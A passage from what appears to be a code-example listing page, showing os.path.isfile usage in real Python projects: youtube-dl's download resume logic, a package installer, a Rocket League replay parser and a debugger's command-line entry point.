                if (err.code < 500 or err.code >= 600) and err.code != 416:
                    # Unexpected HTTP error
                    raise
                elif err.code == 416:
                    # Unable to resume (requested range not satisfiable)
                    try:
                        # Open the connection again without the range header
                        data = self.ydl.urlopen(basic_request)
                        content_length = data.info()['Content-Length']
                    except (compat_urllib_error.HTTPError, ) as err:
                        if err.code < 500 or err.code >= 600:
                            raise
                    else:
                        # Examine the reported length
                        if (content_length is not None and
                                (resume_len - 100 < int(content_length) < resume_len + 100)):
                            # The file had already been fully downloaded.
                            # Explanation to the above condition: in issue #175 it was revealed that
                            # YouTube sometimes adds or removes a few bytes from the end of the file,
                            # changing the file size slightly and causing problems for some users. So
                            # I decided to implement a suggested change and consider the file
                            # completely downloaded if the file size differs less than 100 bytes from
                            # the one in the hard drive.
                            self.report_file_already_downloaded(filename)
                            self.try_rename(tmpfilename, filename)
                            self._hook_progress({
                                'filename': filename,
                                'status': 'finished',
                                'downloaded_bytes': resume_len,
                                'total_bytes': resume_len,
                            })
                            return True
                        else:
                            # The length does not match, we start the download over
                            self.report_unable_to_resume()
                            resume_len = 0
                            open_mode = 'wb'
                            break
            except socket.error as e:
                # A connection reset just triggers a retry; re-raise anything else.
                if e.errno != errno.ECONNRESET:
                    raise

            # Retry
            count += 1
            if count <= retries:
                self.report_retry(count, retries)

        if count > retries:
            self.report_error('giving up after %s retries' % retries)
            return False

        data_len = data.info().get('Content-length', None)

        # Range HTTP header may be ignored/unsupported by a webserver
        # (e.g. extractor/scivee.py, extractor/bambuser.py).
        # However, for a test we still would like to download just a piece of a file.
        # To achieve this we limit data_len to _TEST_FILE_SIZE and manually control
        # block size when downloading a file.
        if is_test and (data_len is None or int(data_len) > self._TEST_FILE_SIZE):
            data_len = self._TEST_FILE_SIZE

        if data_len is not None:
            data_len = int(data_len) + resume_len
            min_data_len = self.params.get('min_filesize')
            max_data_len = self.params.get('max_filesize')
            if min_data_len is not None and data_len < min_data_len:
                self.to_screen('\r[download] File is smaller than min-filesize (%s bytes < %s bytes). Aborting.' % (data_len, min_data_len))
                return False
            if max_data_len is not None and data_len > max_data_len:
                self.to_screen('\r[download] File is larger than max-filesize (%s bytes > %s bytes). Aborting.' % (data_len, max_data_len))
                return False

        byte_counter = 0 + resume_len
        block_size = self.params.get('buffersize', 1024)
        start = time.time()

        # measure time over whole while-loop, so slow_down() and best_block_size() work together properly
        now = None  # needed for slow_down() in the first loop run
        before = start  # start measuring
        while True:

            # Download and write
            data_block = data.read(block_size if not is_test else min(block_size, data_len - byte_counter))
            byte_counter += len(data_block)

            # exit loop when download is finished
            if len(data_block) == 0:
                break

            # Open destination file just in time
            if stream is None:
                try:
                    (stream, tmpfilename) = sanitize_open(tmpfilename, open_mode)
                    assert stream is not None
                    filename = self.undo_temp_name(tmpfilename)
                    self.report_destination(filename)
                except (OSError, IOError) as err:
                    self.report_error('unable to open for writing: %s' % str(err))
                    return False

                if self.params.get('xattr_set_filesize', False) and data_len is not None:
                    try:
                        write_xattr(tmpfilename, 'user.ytdl.filesize', str(data_len).encode('utf-8'))
                    except (XAttrUnavailableError, XAttrMetadataError) as err:
                        self.report_error('unable to set filesize xattr: %s' % str(err))

            try:
                stream.write(data_block)
            except (IOError, OSError) as err:
                self.to_stderr('\n')
                self.report_error('unable to write data: %s' % str(err))
                return False

            # Apply rate limit
            self.slow_down(start, now, byte_counter - resume_len)

            # end measuring of one loop run
            now = time.time()
            after = now

            # Adjust block size
            if not self.params.get('noresizebuffer', False):
                block_size = self.best_block_size(after - before, len(data_block))

            before = after

            # Progress message
            speed = self.calc_speed(start, now, byte_counter - resume_len)
            if data_len is None:
                eta = None
            else:
                eta = self.calc_eta(start, time.time(), data_len - resume_len, byte_counter - resume_len)

            self._hook_progress({
                'status': 'downloading',
                'downloaded_bytes': byte_counter,
                'total_bytes': data_len,
                'tmpfilename': tmpfilename,
                'filename': filename,
                'eta': eta,
                'speed': speed,
                'elapsed': now - start,
            })

            if is_test and byte_counter == data_len:
                break

        if stream is None:
            self.to_stderr('\n')
            self.report_error('Did not get any data blocks')
            return False
        if tmpfilename != '-':
            stream.close()

        if data_len is not None and byte_counter != data_len:
            raise ContentTooShortError(byte_counter, int(data_len))
        self.try_rename(tmpfilename, filename)

        # Update file modification time
        if self.params.get('updatetime', True):
            info_dict['filetime'] = self.try_utime(filename, data.info().get('last-modified', None))

        self._hook_progress({
            'downloaded_bytes': byte_counter,
            'total_bytes': byte_counter,
            'filename': filename,
            'status': 'finished',
            'elapsed': time.time() - start,
        })

        return True
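
The resume logic above hinges on a single os.path.isfile() check: if a partial temp file exists, its size becomes the resume offset sent in the Range header; otherwise the download starts from byte zero. A condensed sketch (the file name is an assumption):

import os

def resume_offset(tmpfilename):
    # Resume from the partial file's size if it exists, else start fresh.
    if os.path.isfile(tmpfilename):
        return os.path.getsize(tmpfilename)
    return 0

offset = resume_offset('video.mp4.part')  # assumed temp file name
headers = {'Range': 'bytes=%d-' % offset} if offset else {}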

Example 45

Project: bep
Source File: install.py
View license
def install_cmd(args, packages_file, packages_file_path, noise, install_dirs, installed_pkgs_dir):
    ''' Installs package(s) for either cmdline install interface or from .bep_packages file install

    Parameters
    ----------
    args:  a class inst of the argparse namespace with the arguments parsed to use during the install.
    packages_file:  the user's .bep_packages file.
    packages_file_path:  the absolute path to the packages_file.
    noise:  noise class inst with the verbosity level for the amount of output to deliver to stdout.
    install_dirs:  dict of install locations for installed pkgs and install logs.
    installed_pkgs_dir:  the absolute path to the where the downloaded and built pkgs are stored.
    '''

    ##### install from packages file    # FIXME -- this is hacky, fix this
    #if ('pkg_type' in args) and (args.pkg_type == "packages"):
    if args.pkg_type == "packages":
        try:  # bring in the packages file
            sys.dont_write_bytecode = True  # to avoid writing a .pyc files (for the packages file)
            pkgs_module = imp.load_source(packages_file, packages_file_path)    # used to import a hidden file (really hackey)
        except (ImportError, IOError):
            print("No {0} file installed for use.".format(packages_file))
            if not os.path.isfile(packages_file_path):  # create packages file if one doesn't already exist.
                #shutil.copy(join('data', packages_file), packages_file_path)    # create a template packages file
                #print("So created template {0} file for installation of packages.".format(packages_file))

                open(packages_file_path, 'a').close()  # creates an empty packages file
                print("So created empty {0} file for installation of packages.".format(packages_file))

            raise SystemExit("Now add the desired packages to the {} file and re-run install.".format(packages_file))



        def raise_problem(pkg_to_install):
            print("\nError: cannot process entry in {}:".format(packages_file))
            print("\t{}\n".format(pkg_to_install))
            print("Item needs to be specified like such:")
            print("\t{} [language-->]repoType+userName/packageName[^branch]".format(name))
            print("\nNote: language and branch are both optional, and repoType only needs")
            print("to be specified if it's not ambigious given where the package comes from:")
            print("\teg. for a github install:  ipython/ipython")
            print("\teg. for a github install:  python3.3-->ipython/ipython")
            print("\teg. for a bitbucket install:  hg+mchaput/whoosh")
            print("\teg. for a local install:  git+/home/username/path/to/repo")
            raise SystemExit


        for pkg_type, pkgs_from_pkgs_file in pkgs_module.packages.items():
            utils.when_not_quiet_mode(utils.status('\t\tInstalling {0} packages'.format(pkg_type)), noise.quiet)

            if pkgs_from_pkgs_file:

                #####################################################################################################
                # FIXME need to refactor what the packages file is (or refactor this here)
                for pkg_to_install_entry in pkgs_from_pkgs_file:

                    lang_N_repo_type_N_pkg_to_install_N_branch = pkg_to_install_entry.split('-->')  # to see if a language is given
                    if len(lang_N_repo_type_N_pkg_to_install_N_branch) == 2:
                        lang_arg, repo_type_N_pkg_to_install_N_branch = lang_N_repo_type_N_pkg_to_install_N_branch

                        repo_type_N_pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch.split('+')    # to see if repo_type given # NOTE this won't work for pypi pkgs b/c there won't be a repo
                        if len(repo_type_N_pkg_to_install_N_branch) == 2:
                            repo_type, pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch

                            pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                            if len(pkg_to_install_N_branch) == 2:
                                pkg_to_install, branch = pkg_to_install_N_branch
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch)
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #NOTE won't work for pypi installs
                                pkg_to_install = pkg_to_install_N_branch[0]
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    branch = utils.get_default_branch(repo_type)
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch) # use default branch
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            else:   # if too many ^ given
                                raise_problem(pkg_to_install_entry)

                        elif len(repo_type_N_pkg_to_install_N_branch) == 1:     # if repo_type not given
                            pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch[0]
                            if pkg_type in ['github']:
                                repo_type = 'git'

                                pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                                if len(pkg_to_install_N_branch) == 2:
                                    pkg_to_install, branch = pkg_to_install_N_branch
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        args = Args(repo_type, pkg_type, pkg_to_install, branch=branch, language=lang_arg)
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #NOTE won't work for pypi installs
                                    pkg_to_install = pkg_to_install_N_branch[0]
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        branch = utils.get_default_branch(repo_type)
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=lang_arg, branch=branch) # use default branch
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                else:   # if too many ^ given
                                    raise_problem(pkg_to_install_entry)
                            else:   # if ambiguous repo_type (w/ more than one repo_type possible)
                                raise_problem(pkg_to_install_entry)
                        else:   # if too many '+'  given
                            raise_problem(pkg_to_install_entry)

                    elif len(lang_N_repo_type_N_pkg_to_install_N_branch) == 1:  # language not given, use system default lang
                        repo_type_N_pkg_to_install_N_branch = lang_N_repo_type_N_pkg_to_install_N_branch[0]

                        repo_type_N_pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch.split('+')    # to see if repo_type given # FIXME this won't work for pypi pkgs b/c there won't be a repo
                        if len(repo_type_N_pkg_to_install_N_branch) == 2:
                            repo_type, pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch

                            pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                            if len(pkg_to_install_N_branch) == 2:
                                pkg_to_install, branch = pkg_to_install_N_branch
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)     # use default language
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #FIXME won't work for pypi installs
                                pkg_to_install = pkg_to_install_N_branch[0]
                                legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                if legit_pkg_name:
                                    branch = utils.get_default_branch(repo_type)
                                    args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)    # use default language & branch,
                                else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                    raise_problem(pkg_to_install_entry)
                            else:   # if too many ^ given
                                raise_problem(pkg_to_install_entry)

                        elif len(repo_type_N_pkg_to_install_N_branch) == 1:     # if repo_type not given
                            pkg_to_install_N_branch = repo_type_N_pkg_to_install_N_branch[0]
                            if pkg_type in ['github']:
                                repo_type = 'git'

                                pkg_to_install_N_branch = pkg_to_install_N_branch.split('^')    # to see if branch is given
                                if len(pkg_to_install_N_branch) == 2:
                                    pkg_to_install, branch = pkg_to_install_N_branch
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)     # use default language
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                elif len(pkg_to_install_N_branch) == 1:     # if branch not given, then get default #FIXME won't work for pypi installs
                                    pkg_to_install = pkg_to_install_N_branch[0]
                                    legit_pkg_name = utils.check_if_valid_pkg_to_install(pkg_to_install, pkg_type)
                                    if legit_pkg_name:
                                        branch = utils.get_default_branch(repo_type)
                                        args = Args(repo_type, pkg_type, pkg_to_install, language=args.language, branch=branch)    # use default language & branch,
                                    else:   # not a legit pkg_to_install in the pkg_to_install_entry
                                        raise_problem(pkg_to_install_entry)
                                else:   # if too many ^ given
                                    raise_problem(pkg_to_install_entry)
                            else:   # if ambiguous repo_type (w/ more than one repo_type possible)
                                raise_problem(pkg_to_install_entry)
                        else:   # if too many '+'  given
                            raise_problem(pkg_to_install_entry)
                    else:   # if not one or two items after "-->" split
                        raise_problem(pkg_to_install_entry)
                    #####################################################################################################

                    # important to see what has previously been installed, so as to not turn on a 2nd version of a package.
                    everything_already_installed = utils.all_pkgs_and_branches_for_all_pkg_types_already_installed(installed_pkgs_dir)

                    pkg_inst = package.create_pkg_inst(args.language, args.pkg_type, install_dirs, args=args) # args are created from the Args class here, unlike where args are the cmdline options for every other action
                    pkg_inst.install(args.pkg_to_install, args, noise, everything_already_installed=everything_already_installed)
            else:
                utils.when_not_quiet_mode('\nNo {0} packages specified in {1} to install.'.format(pkg_type, packages_file), noise.quiet)


    #### install w/ command line arg(s)
    #if 'pkg_to_install' in args:
    else:

        utils.when_not_quiet_mode(utils.status('\t\tInstalling {0} package'.format(args.pkg_type)), noise.quiet)

        pkg_inst = package.create_pkg_inst(args.language, args.pkg_type, install_dirs, args=args)

        # important to keep this here so it can be known what has previously been installed, so as to not turn on a 2nd version of a package.
        everything_already_installed = utils.all_pkgs_and_branches_for_all_pkg_types_already_installed(installed_pkgs_dir)
        pkg_inst.install(args.pkg_to_install, args, noise, everything_already_installed=everything_already_installed)
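
The packages-file bootstrap above uses os.path.isfile() to tell a missing file apart from one that merely failed to import, creating an empty file only in the former case. A reduced sketch of that guard (the path is an assumption):

import os

packages_file_path = os.path.expanduser('~/.bep_packages')  # assumed location
if not os.path.isfile(packages_file_path):
    # Create an empty packages file so the user has something to edit.
    open(packages_file_path, 'a').close()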

Example 46

Project: rocket-league-replays
Source File: parser.py
View license
def parse_replay_netstream(replay_id):
    from .models import PLATFORMS, BoostData, Goal, Player, Replay

    replay_obj = Replay.objects.get(pk=replay_id)

    try:
        if settings.DEBUG:
            if not os.path.isfile(replay_obj.file.path):
                # Download the file.
                command = 'wget https://media.rocketleaguereplays.com/{} -qO {}'.format(
                    replay_obj.file.name,
                    replay_obj.file.path,
                )

                os.system(command)

            replay = json.loads(subprocess.check_output('octane-binaries/octane-*-osx {}'.format(replay_obj.file.path), shell=True).decode('utf-8'))
        else:
            replay = json.loads(subprocess.check_output('octane-binaries/octane-*-linux {}'.format(replay_obj.file.url), shell=True).decode('utf-8'))
    except subprocess.CalledProcessError:
        # Parsing the file failed.
        replay_obj.processed = False
        replay_obj.save()
        return

    replay_obj, replay = _parse_header(replay_obj, replay)

    goals = {
        goal['frame']['Value']: {'PlayerName': goal['PlayerName']['Value'], 'PlayerTeam': goal['PlayerTeam']['Value']}
        for goal in replay['Metadata'].get('Goals', {'Value': []})['Value']
    }

    last_hits = {
        0: None,
        1: None
    }

    actors = {}  # All actors
    player_actors = {}  # XXX: This will be used to make the replay.save() easier.
    goal_actors = {}
    team_data = {}
    actor_positions = {}  # The current position data for all actors. Do we need this?
    player_cars = {}  # Car -> Player actor ID mappings.
    ball_angularvelocity = None  # The current angular velocity of the ball.
    ball_possession = None  # The team currently in possession of the ball.
    cars_frozen = False  # Whether the cars are frozen in place (3.. 2.. 1..)
    shot_data = []  # The locations of the player and the ball when goals were scored.
    unknown_boost_data = {}  # Holding dict for boosts without player data.
    ball_actor_id = None

    location_data = []  # Used for the location JSON.
    boost_data = {}  # Used for the boost stats.
    boost_objects = []
    heatmap_data = {}
    seconds_mapping = {}  # Frame -> seconds remaining mapping.

    heatmap_json_filename = 'uploads/replay_json_files/{}.json'.format(replay_obj.replay_id)
    location_json_filename = 'uploads/replay_location_json_files/{}.json'.format(replay_obj.replay_id)

    for index, frame in enumerate(replay['Frames']):
        # Add an empty location list for this frame.
        location_data.append([])

        ball_hit = False
        confirmed_ball_hit = False
        ball_spawned = False

        if index in goals:
            # Get the ball position.
            ball_actor_id = list(filter(lambda x: actors[x]['Class'] == 'TAGame.Ball_TA', actors))[0]
            ball_position = actor_positions[ball_actor_id]

            # XXX: Update this to also register the hitter?
            hit_position = last_hits[goals[index]['PlayerTeam']]

            shot_data.append({
                'player': hit_position,
                'ball': ball_position,
                'frame': index
            })

            # Reset the last hits.
            last_hits = {
                0: None,
                1: None
            }

        # Handle any new actors.
        for actor_id, value in frame['Spawned'].items():
            actor_id = int(actor_id)

            if actor_id not in actors:
                actors[actor_id] = value

            if 'Engine.Pawn:PlayerReplicationInfo' in value:
                player_actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value'][1]
                player_cars[player_actor_id] = actor_id

            if value['Class'] == 'TAGame.Ball_TA':
                ball_spawned = True

            if value['Class'] == 'TAGame.PRI_TA':
                player_actors[actor_id] = value
                player_actors[actor_id]['joined'] = index

            if value['Class'] == 'TAGame.Team_Soccar_TA':
                team_data[actor_id] = value['Name'].replace('Archetypes.Teams.Team', '')

        # Handle any updates to existing actors.
        for actor_id, value in frame['Updated'].items():
            actor_id = int(actor_id)

            if 'Engine.PlayerReplicationInfo:Team' in value and not value['Engine.PlayerReplicationInfo:Team']['Value']['Int']:
                del value['Engine.PlayerReplicationInfo:Team']

            # Merge the new properties with the existing.
            if actors[actor_id] != value:
                actors[actor_id] = {**actors[actor_id], **value}

                if actor_id in player_actors:
                    player_actors[actor_id] = actors[actor_id]

            if 'Engine.Pawn:PlayerReplicationInfo' in value:
                player_actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value']['Int']
                player_cars[player_actor_id] = actor_id

        # Handle removing any destroyed actors.
        for actor_id in frame['Destroyed']:
            del actors[actor_id]

            if actor_id in player_actors:
                player_actors[actor_id]['left'] = index

        # Loop over actors which have changed in this frame.
        for actor_id, value in {**frame['Spawned'], **frame['Updated']}.items():
            actor_id = int(actor_id)

            # Look for any position data.
            if 'TAGame.RBActor_TA:ReplicatedRBState' in value:
                actor_positions[actor_id] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position']

                # Get the player actor id.
                real_actor_id = actor_id

                for player_actor_id, car_actor_id in player_cars.items():
                    if actor_id == car_actor_id:
                        real_actor_id = player_actor_id
                        break

                if real_actor_id == actor_id:
                    real_actor_id = 'ball'

                data_dict = {'id': real_actor_id}
                data_dict['x'], data_dict['y'], data_dict['z'] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position']
                data_dict['yaw'], data_dict['pitch'], data_dict['roll'] = value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Rotation']
                location_data[index].append(data_dict)

            # If this property exists, the ball has changed possession.
            if 'TAGame.Ball_TA:HitTeamNum' in value:
                ball_hit = confirmed_ball_hit = True
                hit_team_num = value['TAGame.Ball_TA:HitTeamNum']['Value']
                ball_possession = hit_team_num

                # Clean up the actor positions.
                actor_positions_copy = actor_positions.copy()
                for actor_position in actor_positions_copy:
                    found = False

                    for car in player_cars:
                        if actor_position == player_cars[car]:
                            found = True

                    if not found and actor_position != ball_actor_id:
                        del actor_positions[actor_position]

            # Store the boost data for each actor at each frame where it changes.
            if 'TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount' in value:
                boost_value = value['TAGame.CarComponent_Boost_TA:ReplicatedBoostAmount']['Value']
                assert 0 <= boost_value <= 255, 'Boost value {} is not in range 0-255.'.format(boost_value)

                if actor_id not in boost_data:
                    boost_data[actor_id] = {}

                # Sometimes we have a boost component without a reference to
                # a car. We don't want to lose that data, so stick it into a
                # holding dictionary until we can figure out who it belongs to.

                if 'TAGame.CarComponent_TA:Vehicle' not in actors[actor_id]:
                    if actor_id not in unknown_boost_data:
                        unknown_boost_data[actor_id] = {}

                    unknown_boost_data[actor_id][index] = boost_value
                else:
                    car_id = actors[actor_id]['TAGame.CarComponent_TA:Vehicle']['Value']['Int']

                    # Find out which player this car belongs to.
                    try:
                        player_actor_id = [
                            player_actor_id
                            for player_actor_id, car_actor_id in player_cars.items()
                            if car_actor_id == car_id
                        ][0]

                        if player_actor_id not in boost_data:
                            boost_data[player_actor_id] = {}

                        boost_data[player_actor_id][index] = boost_value

                        # Attach any floating data (if we can).
                        if actor_id in unknown_boost_data:
                            for frame_index, boost_value in unknown_boost_data[actor_id].items():
                                boost_data[player_actor_id][frame_index] = boost_value

                            del unknown_boost_data[actor_id]

                    except IndexError:
                        pass

            # Store the mapping of frame -> clock time.
            if 'TAGame.GameEvent_Soccar_TA:SecondsRemaining' in value:
                seconds_mapping[index] = value['TAGame.GameEvent_Soccar_TA:SecondsRemaining']['Value']

            # See if the cars are frozen in place.
            if 'TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining' in value:
                if value['TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining']['Value'] == 3:
                    cars_frozen = True
                elif value['TAGame.GameEvent_TA:ReplicatedGameStateTimeRemaining']['Value'] == 0:
                    cars_frozen = False

            # Get the camera details.
            if 'TAGame.CameraSettingsActor_TA:ProfileSettings' in value:
                if actors[actor_id]['Class'] == 'TAGame.CameraSettingsActor_TA':
                    # Define some short variable names to stop the next line
                    # being over 200 characters long.  This block of code
                    # makes new replays have a camera structure which is
                    # similar to that of the old replays - where the camera
                    # settings are directly attached to the player rather
                    # than a CameraActor (which is what the actor in this
                    # current loop is).

                    csa = 'TAGame.CameraSettingsActor_TA:PRI'
                    ps = 'TAGame.CameraSettingsActor_TA:ProfileSettings'
                    cs = 'TAGame.PRI_TA:CameraSettings'

                    if csa in value:
                        player_actor_id = value[csa]['Value']['Int']
                        actors[player_actor_id][cs] = value[ps]['Value']

            if 'Engine.GameReplicationInfo:ServerName' in value:
                replay_obj.server_name = value['Engine.GameReplicationInfo:ServerName']['Value']

            if 'ProjectX.GRI_X:ReplicatedGamePlaylist' in value:
                replay_obj.playlist = value['ProjectX.GRI_X:ReplicatedGamePlaylist']['Value']

            if 'TAGame.GameEvent_Team_TA:MaxTeamSize' in value:
                replay_obj.team_sizes = value['TAGame.GameEvent_Team_TA:MaxTeamSize']['Value']

            if 'TAGame.PRI_TA:MatchGoals' in value:
                # Get the closest goal to this frame.
                goal_actors[index] = actor_id

            if 'Engine.TeamInfo:Score' in value:
                if index not in goal_actors:
                    goal_actors[index] = actor_id

        # Work out which direction the ball is travelling and if it has
        # changed direction or speed.
        ball = None
        ball_actor_id = None
        for actor_id, value in actors.items():
            if value['Class'] == 'TAGame.Ball_TA':
                ball_actor_id = actor_id
                ball = value
                break

        ball_hit = False

        # Take a look at the ball this frame, has anything changed?
        if ball and 'TAGame.RBActor_TA:ReplicatedRBState' in ball:
            new_ball_angularvelocity = ball['TAGame.RBActor_TA:ReplicatedRBState']['Value']['AngularVelocity']

            # The ball has *changed direction*, but not necessarily been hit (it
            # may have bounced).

            if ball_angularvelocity != new_ball_angularvelocity:
                ball_hit = True

            ball_angularvelocity = new_ball_angularvelocity

            # Calculate the current distances between cars and the ball.
            # Do we have position data for the ball?
            if ball_hit and not ball_spawned and ball_actor_id in actor_positions:

                # Iterate over the cars to get the players.
                lowest_distance = None
                lowest_distance_car_actor = None

                for player_id, car_actor_id in player_cars.items():
                    # Get the team.
                    if (
                        player_id in actors and
                        'Engine.PlayerReplicationInfo:Team' in actors[player_id] and
                        actors[player_id]['Engine.PlayerReplicationInfo:Team']['Value']['Int']
                    ):
                        team_id = actors[player_id]['Engine.PlayerReplicationInfo:Team']['Value']['Int']

                        try:
                            team_actor = actors[team_id]
                            team = int(team_actor['Name'].replace('Archetypes.Teams.Team', ''))
                        except KeyError:
                            team = -1
                    else:
                        team = -1

                    # Make sure this actor is on the team which is currently
                    # in possession.

                    if team != ball_possession:
                        continue

                    if car_actor_id in actor_positions:
                        actor_distance = distance(actor_positions[car_actor_id], actor_positions[ball_actor_id])

                        if not confirmed_ball_hit:
                            if actor_distance > 350:  # Value taken from the max confirmed distance.
                                continue

                        # Get the player on this team with the lowest distance.
                        if lowest_distance is None or actor_distance < lowest_distance:
                            lowest_distance = actor_distance
                            lowest_distance_car_actor = car_actor_id

                if lowest_distance_car_actor:
                    last_hits[ball_possession] = actor_positions[lowest_distance_car_actor]

        # Generate the heatmap data for this frame.  Get all of the players
        # and the ball.
        if not cars_frozen:
            moveable_actors = [
                (actor_id, value)
                for actor_id, value in actors.items()
                if value['Class'] in ['TAGame.Ball_TA', 'TAGame.PRI_TA', 'TAGame.Car_TA'] and
                (
                    'TAGame.RBActor_TA:ReplicatedRBState' in value or
                    'Position' in value
                )
            ]

            for actor_id, value in moveable_actors:
                if value['Class'] == 'TAGame.Ball_TA':
                    actor_id = 'ball'
                elif value['Class'] == 'TAGame.Car_TA':
                    if 'Engine.Pawn:PlayerReplicationInfo' not in value:
                        continue

                    actor_id = value['Engine.Pawn:PlayerReplicationInfo']['Value']['Int']

                if 'TAGame.RBActor_TA:ReplicatedRBState' in value:
                    key = '{},{}'.format(
                        value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position'][0],
                        value['TAGame.RBActor_TA:ReplicatedRBState']['Value']['Position'][1],
                    )
                elif 'Position' in value:
                    key = '{},{}'.format(
                        value['Position'][0],
                        value['Position'][1],
                    )

                if actor_id not in heatmap_data:
                    heatmap_data[actor_id] = {}

                if key in heatmap_data[actor_id]:
                    heatmap_data[actor_id][key] += 1
                else:
                    heatmap_data[actor_id][key] = 1

Example 47

Project: python2-trepan
Source File: cli.py
View license
def main(dbg=None, sys_argv=list(sys.argv)):
    """Routine which gets run if we were invoked directly"""

    # Save the original just for use in the restart that works via exec.
    orig_sys_argv = list(sys_argv)
    opts, dbg_opts, sys_argv  = Moptions.process_options(__title__,
                                                         __version__,
                                                         sys_argv)
    if opts.server:
        connection_opts={'IO': 'TCP', 'PORT': opts.port}
        intf = Mserver.ServerInterface(connection_opts=connection_opts)
        dbg_opts['interface'] = intf
        if 'FIFO' == intf.server_type:
            print('Starting FIFO server for process %s.' % os.getpid())
        elif 'TCP' == intf.server_type:
            print('Starting TCP server listening on port %s.' %
                  intf.inout.PORT)
            pass
    elif opts.client:
        Mclient.main(opts, sys_argv)
        return

    dbg_opts['orig_sys_argv'] = orig_sys_argv

    if dbg is None:
        dbg = Mdebugger.Debugger(dbg_opts)
        dbg.core.add_ignore(main)
        pass
    Moptions._postprocess_options(dbg, opts)

    # process_options has munged sys.argv to remove any options that
    # belong to this debugger. The original options used to invoke the
    # debugger and script are in the global sys_argv.

    if len(sys_argv) == 0:
        # No program given to debug. Set to go into a command loop
        # anyway
        mainpyfile = None
    else:
        mainpyfile = sys_argv[0]  # Get script filename.
        if not os.path.isfile(mainpyfile):
            mainpyfile=Mclifns.whence_file(mainpyfile)
            is_readable = Mfile.readable(mainpyfile)
            if is_readable is None:
                print("%s: Python script file '%s' does not exist"
                      % (__title__, mainpyfile,), file=sys.stderr)
                sys.exit(1)
            elif not is_readable:
                print("%s: Can't read Python script file '%s'"
                      % (__title__, mainpyfile, ), file=sys.stderr)
                sys.exit(1)
                return

        if Mfile.is_compiled_py(mainpyfile):
            try:
                from uncompyle6 import uncompyle_file
            except ImportError:
                print("%s: Compiled python file '%s', but uncompyle6 not found"
                    % (__title__, mainpyfile), file=sys.stderr)
                sys.exit(1)

            short_name = os.path.splitext(os.path.basename(mainpyfile))[0]
            fd = tempfile.NamedTemporaryFile(suffix='.py',
                                             prefix=short_name + "_",
                                             delete=False)
            try:
                uncompyle_file(mainpyfile, fd)
            except:
                print("%s: error uncompyling '%s'"
                      % (__title__, mainpyfile), file=sys.stderr)
                sys.exit(1)
            mainpyfile = fd.name
            fd.close()

        # If mainpyfile is an optimized Python script try to find and
        # use non-optimized alternative.
        mainpyfile_noopt = Mfile.file_pyc2py(mainpyfile)
        if mainpyfile != mainpyfile_noopt \
               and Mfile.readable(mainpyfile_noopt):
            print("%s: Compiled Python script given and we can't use that."
                  % __title__, file=sys.stderr)
            print("%s: Substituting non-compiled name: %s" % (
                __title__, mainpyfile_noopt,), file=sys.stderr)
            mainpyfile = mainpyfile_noopt
            pass

        # Replace trepan's dir with script's dir in front of
        # module search path.
        sys.path[0] = dbg.main_dirname = os.path.dirname(mainpyfile)

    # XXX If a signal has been received we continue in the loop, otherwise
    # the loop exits for some reason.
    dbg.sig_received = False

    # if not mainpyfile:
    #     print('For now, you need to specify a Python script name!')
    #     sys.exit(2)
    #     pass

    while True:

        # Run the debugged script over and over again until we get it
        # right.

        try:
            if dbg.program_sys_argv and mainpyfile:
                normal_termination = dbg.run_script(mainpyfile)
                if not normal_termination: break
            else:
                dbg.core.execution_status = 'No program'
                dbg.core.processor.process_commands()
                pass

            dbg.core.execution_status = 'Terminated'
            dbg.intf[-1].msg("The program finished - quit or restart")
            dbg.core.processor.process_commands()
        except Mexcept.DebuggerQuit:
            break
        except Mexcept.DebuggerRestart:
            dbg.core.execution_status = 'Restart requested'
            if dbg.program_sys_argv:
